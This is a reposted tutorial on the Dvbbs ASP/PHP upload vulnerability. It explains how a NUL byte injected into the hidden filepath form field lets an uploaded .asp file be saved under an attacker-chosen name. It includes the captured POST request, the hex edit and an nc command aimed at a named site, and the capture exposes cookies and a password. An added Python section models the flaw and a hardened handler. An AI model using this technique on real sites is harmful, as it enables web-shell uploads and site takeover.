PHP/ASP upload vulnerability exploration (repost)

xiaoxiao 2021-03-06 41

1: Background

An upload vulnerability is simply an ASP or PHP script that accepts files submitted through an HTML form. Tools used:

NC (Netcat) submits the packet from the DOS prompt: nc -vv www.***.com 80 < 1.txt, where -vv gives verbose output, www.***.com is the host, 80 is the web port and 1.txt is the packet you want to send (see the post for more usage).

WSE (WSockExpert) monitors the local port and captures the packet that IE submits.

2: Principle of the vulnerability

The following example assumes a web host www.***.com with the forum at /bbs/. The vulnerability came out of research on the Dvbbs forum; it is recommended to look at Dvbbs's UPFILE.ASP file. There is no need to understand all of it: UPFile simply generates a form, whose relevant fields are listed below.

Variables used: filepath (default uploadface, hidden); act (default upload, hidden); file1 is the file you want to upload. The key is the filepath variable! By default our file is uploaded to www.***.com/bbs/uploadface/ and is named after the upload time; this is the line in Upfile:

filename = FormPath & Year(now) & Month(now) & Hour(now) & Second(now) & Rannum & "." & fileext

We know that strings in the computer end with a "\0" terminator: anyone who has used C knows that for char data[] = "bbs" the array length is 4, namely b, b, s and \0. So if we construct filepath as follows, what happens?

filepath = "/newmm.asp\0"

Suppose we upload at 2004.09.24 08:24. With filepath unchanged, the file is saved as:

http://www.***.com/bbs/uploadface/200409240824.jpg

With our filepath it becomes:

http://www.***.com/newmm.asp\0200409240824.jpg

When the server receives the filepath data it reads up to the \0 after newmm.asp and treats that as the end of the string, so the file we uploaded (an .asp file from the local disk) is saved as:

http://www.***.com/newmm.asp

3: After the vulnerability was announced

After the vulnerability was announced, many websites applied corresponding fixes, but few of them actually filter and sanitize the filepath variable. The Upfile.exe published on the Internet is a tool for exploiting the upload vulnerability, or rather the filepath variable (veteran)... but the most basic thing has not changed, and similar vulnerabilities exist in plug-ins on websites. Rather than relying on dedicated tools, you can simply change the filepath variable in the packet captured with WSE and then submit it with NC; even if they add N more hidden variables, it makes no difference.

Of course, if filepath is filtered very strictly, this theory comes to an end, and a new theory is born!

4: Detailed example

First, the WSE capture (saved to 1.txt):

POST /bbs/upphoto/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xin126.com/bbs/upphoto/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.xin126.com
Content-Length: 1969
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome=1; gamvancookies=1; regtime=2004%2D9%2D24 3%3A39%3A37; username=szjwwww; pass=5211314; dl=0; userid=62; ltstyle=0; logintry=1; userpass=EB03F6C72908FD84

-----------------------------7D423A138D0278
Content-Disposition: form-data; name="filepath"

../medias/myphoto/
-----------------------------7D423A138D0278
...
Upload
-----------------------------7D423A138D0278--

Second, open 1.txt in UltraEdit and change the data:

...
-----------------------------7D423A138D0278
Content-Disposition: form-data; name="filepath"

/newmm.asp█   <=== the black block is a space (0x20); change it to 0x00
...
-----------------------------7D423A138D0278

Third, recalculate the Content-Length and submit with NC:

nc -vv www.xin126.com 80 < 1.txt

UltraEdit is a hex (base-16) editor that can be downloaded online; we mainly use it to write the terminator, which in hex is 0x00 (00h). Actually the change is just to append a 00 byte to the end of filepath, after which the Content-Length must be recalculated: once you change filepath, the Content-Length changes too.
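The following Python model is added here as an example; it is not part of the original post and not Dvbbs code. It reproduces, at string level, the concatenation-then-truncation behaviour described in sections 2 and 4 (a client-controlled filepath carrying a NUL byte causes a C-string file API to cut the name short), and sets beside it a hardened handler that never consults the client's filepath field, rejects NUL and path separators, whitelists the extension and generates the name on the server. The function names, the extension whitelist, the timestamp format (an approximation of the VBScript Year/Month/... calls) and the sample upload time are assumptions made for the example; the truncation is modelled in Python rather than performed against a real file API.

```python
"""Added example (not from the original post): a string-level model of the
NUL-byte truncation behind the Dvbbs filepath bug, plus a hardened handler.
All names, paths and times below are constructed for the example."""
import os
from datetime import datetime

# Extensions the hardened handler is willing to store (constructed whitelist).
SAFE_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# Constructed upload time matching the post's 2004.09.24 08:24 scenario.
SAMPLE_TIME = datetime(2004, 9, 24, 8, 24, 0)


def asp_style_filename(form_path: str, when: datetime, rannum: int, fileext: str) -> str:
    """Mirror the Upfile.asp concatenation: FormPath & <timestamp> & Rannum & "." & fileext.
    The timestamp layout is an approximation of the VBScript Year/Month/... calls."""
    return f"{form_path}{when.strftime('%Y%m%d%H%M%S')}{rannum}.{fileext}"


def c_string_truncate(path: str) -> str:
    """What a C-string file API (the native layer under FileSystemObject) sees:
    everything from the first NUL onward is dropped."""
    nul = path.find("\x00")
    return path if nul < 0 else path[:nul]


def vulnerable_saved_path(filepath_field: str, when: datetime, rannum: int, fileext: str) -> str:
    """Legacy behaviour: trust the client's filepath field, then let the
    file API truncate at the NUL the client smuggled into it."""
    return c_string_truncate(asp_style_filename(filepath_field, when, rannum, fileext))


def hardened_saved_path(original_name: str, when: datetime, rannum: int,
                        upload_root: str = "/bbs/uploadface/") -> str:
    """Hardened behaviour: the client-supplied filepath field is never consulted;
    the directory is a fixed server-side root, the name is server-generated,
    and the extension must pass NUL/separator checks and the whitelist."""
    if any(ch in original_name for ch in ("\x00", "/", "\\")):
        raise ValueError("illegal character in uploaded filename")
    if "." not in original_name:
        raise ValueError("uploaded filename has no extension")
    ext = original_name.rsplit(".", 1)[1].lower()
    if ext not in SAFE_EXTENSIONS:
        raise ValueError(f"extension {ext!r} is not permitted")
    return asp_style_filename(upload_root, when, rannum, ext)


def field_has_embedded_nul(raw_field: bytes) -> bool:
    """Detection hook for a request filter or WAF rule: a NUL byte inside a
    multipart field that names a path or file is never legitimate."""
    return b"\x00" in raw_field


def runtime_rejects_embedded_nul(candidate: str) -> bool:
    """Modern runtimes refuse NUL in a path outright (Python raises ValueError)
    instead of silently truncating the way the legacy C-string path did."""
    try:
        os.stat(candidate)
    except ValueError:
        return True
    except OSError:
        return False
    return False


if __name__ == "__main__":
    print(vulnerable_saved_path("/bbs/uploadface/", SAMPLE_TIME, 1234, "jpg"))
    print(vulnerable_saved_path("/newmm.asp\x00", SAMPLE_TIME, 1234, "jpg"))
    print(hardened_saved_path("photo.jpg", SAMPLE_TIME, 1234))
    print(field_has_embedded_nul(b"/newmm.asp\x00"))
    print(runtime_rejects_embedded_nul("/newmm.asp\x00200409240824.jpg"))
```

Two points the model makes explicit: the fix is not "filter the NUL byte out of filepath" but "stop deriving the save location from the client at all", and on a current runtime the same input fails loudly instead of truncating, so a NUL in any multipart field is a clean detection signal rather than something a handler should tolerate.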

Please credit the original source when reposting: https://www.9cbs.com/read-57466.html
